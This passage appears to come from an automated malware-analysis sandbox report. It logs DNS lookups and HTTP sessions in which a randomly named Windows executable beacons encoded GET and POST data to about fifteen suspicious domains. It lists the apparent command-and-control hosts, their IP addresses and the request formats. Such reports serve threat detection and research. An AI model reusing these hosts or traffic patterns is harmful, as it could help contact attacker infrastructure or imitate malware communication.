                      Aug 23, 2024 08:27:03.799355030 CEST53598291.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:17.278268099 CEST5910453192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:17.738147020 CEST53591041.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:31.027570963 CEST5625853192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:31.716407061 CEST53562581.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:45.167628050 CEST6480553192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:45.176336050 CEST53648051.1.1.1192.168.2.6
                      Aug 23, 2024 08:27:53.231097937 CEST5563753192.168.2.61.1.1.1
                      Aug 23, 2024 08:27:53.328103065 CEST53556371.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:06.701051950 CEST6266353192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:06.722100019 CEST53626631.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:20.090229034 CEST6503553192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:20.568566084 CEST53650351.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:33.964751959 CEST6449753192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:33.994362116 CEST53644971.1.1.1192.168.2.6
                      Aug 23, 2024 08:28:47.310401917 CEST6250953192.168.2.61.1.1.1
                      Aug 23, 2024 08:28:47.988341093 CEST53625091.1.1.1192.168.2.6
                      Aug 23, 2024 08:29:02.276643038 CEST6348953192.168.2.61.1.1.1
                      Aug 23, 2024 08:29:02.293705940 CEST53634891.1.1.1192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Aug 23, 2024 08:25:53.331392050 CEST192.168.2.61.1.1.10x8d21Standard query (0)www.weep.siteA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:09.386488914 CEST192.168.2.61.1.1.10xd2f7Standard query (0)www.88nn.proA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:22.936567068 CEST192.168.2.61.1.1.10x9fb4Standard query (0)www.fontanerourgente.netA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:36.621120930 CEST192.168.2.61.1.1.10xf60bStandard query (0)www.onlytradez.clubA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:49.762443066 CEST192.168.2.61.1.1.10x27dfStandard query (0)www.32wxd.topA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:03.753164053 CEST192.168.2.61.1.1.10xc538Standard query (0)www.jaxo.xyzA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:17.278268099 CEST192.168.2.61.1.1.10x526aStandard query (0)www.xforum.techA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:31.027570963 CEST192.168.2.61.1.1.10xa871Standard query (0)www.cannulafactory.topA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:45.167628050 CEST192.168.2.61.1.1.10x5e40Standard query (0)www.taapbit.onlineA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:53.231097937 CEST192.168.2.61.1.1.10x561eStandard query (0)www.ayypromo.shopA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:06.701051950 CEST192.168.2.61.1.1.10x1472Standard query (0)www.anaidittrich.comA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:20.090229034 CEST192.168.2.61.1.1.10x928aStandard query (0)www.551108k5.shopA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:33.964751959 CEST192.168.2.61.1.1.10x7a17Standard query (0)www.datensicherung.emailA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:47.310401917 CEST192.168.2.61.1.1.10x708Standard query (0)www.jiyitf.topA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:29:02.276643038 CEST192.168.2.61.1.1.10x4bf3Standard query (0)www.tadalaturbo.onlineA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Aug 23, 2024 08:25:53.347820044 CEST1.1.1.1192.168.2.60x8d21No error (0)www.weep.siteweep.siteCNAME (Canonical name)IN (0x0001)false
                      Aug 23, 2024 08:25:53.347820044 CEST1.1.1.1192.168.2.60x8d21No error (0)weep.site194.233.65.154A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:09.411468029 CEST1.1.1.1192.168.2.60xd2f7No error (0)www.88nn.pro45.157.69.194A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:22.987282991 CEST1.1.1.1192.168.2.60x9fb4No error (0)www.fontanerourgente.netfontanerourgente.netCNAME (Canonical name)IN (0x0001)false
                      Aug 23, 2024 08:26:22.987282991 CEST1.1.1.1192.168.2.60x9fb4No error (0)fontanerourgente.net37.187.158.211A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:36.633464098 CEST1.1.1.1192.168.2.60xf60bNo error (0)www.onlytradez.club167.172.133.32A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:26:50.199295998 CEST1.1.1.1192.168.2.60x27dfNo error (0)www.32wxd.top32wxd.topCNAME (Canonical name)IN (0x0001)false
                      Aug 23, 2024 08:26:50.199295998 CEST1.1.1.1192.168.2.60x27dfNo error (0)32wxd.top206.119.82.116A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:03.799355030 CEST1.1.1.1192.168.2.60xc538No error (0)www.jaxo.xyz66.29.149.180A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:17.738147020 CEST1.1.1.1192.168.2.60x526aNo error (0)www.xforum.tech103.224.182.242A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:31.716407061 CEST1.1.1.1192.168.2.60xa871No error (0)www.cannulafactory.top18.183.3.45A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:45.176336050 CEST1.1.1.1192.168.2.60x5e40Name error (3)www.taapbit.onlinenonenoneA (IP address)IN (0x0001)false
                      Aug 23, 2024 08:27:53.328103065 CEST1.1.1.1192.168.2.60x561eNo error (0)www.ayypromo.shop176.57.64.102A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:06.722100019 CEST1.1.1.1192.168.2.60x1472No error (0)www.anaidittrich.com162.55.254.209A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:20.568566084 CEST1.1.1.1192.168.2.60x928aNo error (0)www.551108k5.shopgangli.ssywan.comCNAME (Canonical name)IN (0x0001)false
                      Aug 23, 2024 08:28:20.568566084 CEST1.1.1.1192.168.2.60x928aNo error (0)gangli.ssywan.com64.64.237.133A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:33.994362116 CEST1.1.1.1192.168.2.60x7a17No error (0)www.datensicherung.email85.13.151.9A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:47.988341093 CEST1.1.1.1192.168.2.60x708No error (0)www.jiyitf.top172.67.215.136A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:28:47.988341093 CEST1.1.1.1192.168.2.60x708No error (0)www.jiyitf.top104.21.35.73A (IP address)IN (0x0001)false
                      Aug 23, 2024 08:29:02.293705940 CEST1.1.1.1192.168.2.60x4bf3No error (0)www.tadalaturbo.onlinetadalaturbo.onlineCNAME (Canonical name)IN (0x0001)false
                      Aug 23, 2024 08:29:02.293705940 CEST1.1.1.1192.168.2.60x4bf3No error (0)tadalaturbo.online192.185.211.122A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.weep.site
                      • www.88nn.pro
                      • www.fontanerourgente.net
                      • www.onlytradez.club
                      • www.32wxd.top
                      • www.jaxo.xyz
                      • www.xforum.tech
                      • www.cannulafactory.top
                      • www.ayypromo.shop
                      • www.anaidittrich.com
                      • www.551108k5.shop
                      • www.datensicherung.email
                      • www.jiyitf.top
                      • www.tadalaturbo.online

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649718194.233.65.154806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:25:53.372277021 CEST500OUTGET /v1m8/?Xn70_=MbosJJuAq5eUJ0hPiGjwIN1TLoIAcga9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjssfFBuX2F/io1ZFH4zFtNPAFxgqhGgKh1aBi0mxPguqsni1l53c=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.weep.site
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:25:54.333453894 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:25:54 GMT
                      Server: Apache
                      Accept-Ranges: bytes
                      Cache-Control: no-cache, no-store, must-revalidate
                      Pragma: no-cache
                      Expires: 0
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html
                      Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                      Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                      Aug 23, 2024 08:25:54.333472967 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                      Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                      Aug 23, 2024 08:25:54.333483934 CEST448INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                      Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                      Aug 23, 2024 08:25:54.333496094 CEST1236INData Raw: 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                      Data Ascii: a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .
                      Aug 23, 2024 08:25:54.333595037 CEST1236INData Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
                      Data Ascii: 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KG
                      Aug 23, 2024 08:25:54.333606005 CEST1236INData Raw: 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34
                      Data Ascii: IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l
                      Aug 23, 2024 08:25:54.333616972 CEST672INData Raw: 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56
                      Data Ascii: hVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIs
                      Aug 23, 2024 08:25:54.333628893 CEST892INData Raw: 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d
                      Data Ascii: GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6h
                      Aug 23, 2024 08:25:54.333729982 CEST1236INData Raw: 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b
                      Data Ascii: x8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .contain
                      Aug 23, 2024 08:25:54.333740950 CEST1236INData Raw: 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 0d 0a 31 61 63 0d 0a 54 68 65 20 73 65 72 76 65 72 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 70 61 67 65 3a 3c 2f 70 3e 0a 20 20 20 20 20
                      Data Ascii: <p class="reason-text">1acThe server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container"> <div class="additional-info-items"> <
                      Aug 23, 2024 08:25:54.334057093 CEST141INData Raw: 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 31 36 20 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20
                      Data Ascii: class="copyright">Copyright 2016 cPanel, Inc.</div> </a> </div> </footer> </body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.64972145.157.69.194806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:09.429574966 CEST742OUTPOST /l4rw/ HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.88nn.pro
                      Referer: http://www.88nn.pro/l4rw/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 69 47 68 4a 53 4e 72 53 36 6b 49 6d 7a 30 76 65 48 56 30 36 2f 46 6b 51 35 62 32 37 73 66 34 66 41 62 42 6d 34 71 53 4c 47 35 4d
                      Data Ascii: Xn70_=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkiGhJSNrS6kImz0veHV06/FkQ5b27sf4fAbBm4qSLG5M
                      Aug 23, 2024 08:26:10.267561913 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:10 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.64972245.157.69.194806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:11.979708910 CEST766OUTPOST /l4rw/ HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.88nn.pro
                      Referer: http://www.88nn.pro/l4rw/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4e 39 68 70 67 4f 50 6e 62 4e 47 56 62 71 33 6d 31 36 56 76 4e 69 39 68 30 6d 39 74 37 75 6b 48 38 7a 55 45 6c 6b 48 34 76 4f 48 31 75 6b 70 49 69 34 54 61 48 4e 43 67 36 53 74 36 6f 4e 70 4e 32 70 57 4b 70 68 5a 56 70 55 30 78 48 5a 66 50 5a 63 77 72 49 78 63 51 41 63 45 42 69 7a 46 4c 54 4a 61 41 48 78 46 35 2f 34 79 4d 45 70 4d 6b 4c 71 43 78 52 6e 2b 74 6a 7a 42 47 7a 4e 62 50 4c 41 74 71 6c 31 31 43 30 56 58 6f 76 6c 6d 51 37 44 45 37 4d 66 53 64 41 6a 42 30 76 6d 31 45 79 63 76 4a 4c 61 49 43 76 31 6e 6b 73 56 5a 62 47 31 47 6c 47 6c 2b 42 41 3d 3d
                      Data Ascii: Xn70_=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovlmQ7DE7MfSdAjB0vm1EycvJLaICv1nksVZbG1GlGl+BA==
                      Aug 23, 2024 08:26:12.814779997 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:12 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.64972345.157.69.194806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:14.526680946 CEST1779OUTPOST /l4rw/ HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.88nn.pro
                      Referer: http://www.88nn.pro/l4rw/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4d 46 68 70 53 57 50 31 6f 6c 47 53 62 71 33 76 56 36 57 76 4e 6a 68 68 77 43 68 74 37 71 72 48 2b 37 55 4c 6e 38 48 76 75 4f 48 38 75 6b 70 42 43 34 51 56 6e 4e 54 67 36 43 78 36 70 39 70 4e 32 70 57 4b 72 35 5a 43 74 49 30 69 58 5a 41 62 4a 63 38 38 59 78 30 51 41 55 36 42 69 6e 56 4c 6a 70 61 41 6d 42 46 36 4a 6b 79 4f 6b 70 4f 6e 4c 71 61 78 52 72 6c 74 6a 66 37 47 7a 34 54 50 4b 34 74 6f 67 63 42 59 67 42 2f 38 76 70 72 46 35 2f 31 31 61 54 4e 52 54 66 4e 33 38 47 37 4e 68 45 6a 4d 4d 62 4c 58 6f 64 6c 6c 50 5a 76 5a 69 45 5a 72 6b 38 69 58 31 68 4d 31 4d 38 47 31 52 37 75 32 47 6a 65 6a 4a 53 56 4a 30 71 48 2f 66 38 79 79 37 49 7a 64 37 36 79 37 68 7a 38 33 70 49 69 74 31 4d 71 68 49 48 50 67 42 59 66 5a 54 57 4e 6e 38 34 36 79 67 32 56 2f 2f 48 6b 32 34 55 4a 38 69 67 65 67 4a 5a 4b 39 6b 4f 53 68 71 58 6c 58 65 36 38 63 37 47 76 79 42 71 7a 69 57 44 75 [TRUNCATED]
                      Data Ascii: Xn70_=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29MFhpSWP1olGSbq3vV6WvNjhhwCht7qrH+7ULn8HvuOH8ukpBC4QVnNTg6Cx6p9pN2pWKr5ZCtI0iXZAbJc88Yx0QAU6BinVLjpaAmBF6JkyOkpOnLqaxRrltjf7Gz4TPK4togcBYgB/8vprF5/11aTNRTfN38G7NhEjMMbLXodllPZvZiEZrk8iX1hM1M8G1R7u2GjejJSVJ0qH/f8yy7Izd76y7hz83pIit1MqhIHPgBYfZTWNn846yg2V//Hk24UJ8igegJZK9kOShqXlXe68c7GvyBqziWDu6rAEf8hSygzk2RILwYJlyV2uStBNTXz3zd9jrJlyZPLbXSdkyADFeDcst9al+VQi8ffNkP00VejnzCQpgAMLxBF2xSsh4uv9VYXugPVo4KYFfBZxTHx3uHp2ivEd8Q+QpIu1O6qG6iG1ZNw+fxuOMGS9+i7IW/cuuWuZ+4Bby5z6dJ4hvrEr4wLTAVTwj4/KigfxlnTWgXDW5JUIYSEQTuMq54kanqu+paObi0B8mtyCCpBjGPbKyPvyoLB452SdrpEqg4Vevtlbsyb1mDonml51WiMKB3jT5wEsGWDpA77eEeBgdDgo3lBL8uM7WoduylNpKudLThZXBF/YmvYTGP5HDyKNdwVvGSWRICauJSByi0eQ+a2LELYVsX6k+VH/5cbpnlozXN9J6ilYNYD2lDi54c/QRDKqAQ8QyvztfeNidMqpWi8JcYvQYnyUCE1kJnX/HbsLBM5GLm4gk0RrLFQRTcneN8jdyIuq2VRS2tNNQzGYxJ5EA7zRcTlTyLnOshS4ZrNCzFi21VZK/0J83B79qjvucdSlrFw7XX6F